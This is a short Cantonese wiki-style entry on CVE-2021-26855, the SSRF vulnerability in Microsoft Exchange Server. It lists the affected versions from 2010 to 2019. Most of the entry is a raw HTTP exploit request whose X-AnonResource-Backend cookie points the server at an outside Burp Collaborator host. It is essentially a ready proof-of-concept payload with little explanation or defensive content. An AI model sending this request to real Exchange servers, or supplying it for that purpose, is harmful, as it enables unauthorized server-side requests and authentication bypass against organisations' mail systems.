CVE-2021-26855_-_Exchange_Server_SSRF漏洞

# CVE-2021-26855 – Exchange Server SSRF漏洞/yue

==漏洞簡介==
Exchange服務器端請求偽造（SSRF）漏洞，利用呢個漏洞嘅攻擊者可以發送任意HTTP請求並通過Exchange Server進行身份驗證。

==影響範圍==

Microsoft Exchange Server: 2010

Microsoft Exchange Server: 2013

Microsoft Exchange Server: 2016

Microsoft Exchange Server: 2019

==SSRF==

GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close

[[檔案:Ssrf.jpg]]

文章版权归作者所有，未经允许请勿转载。

THE END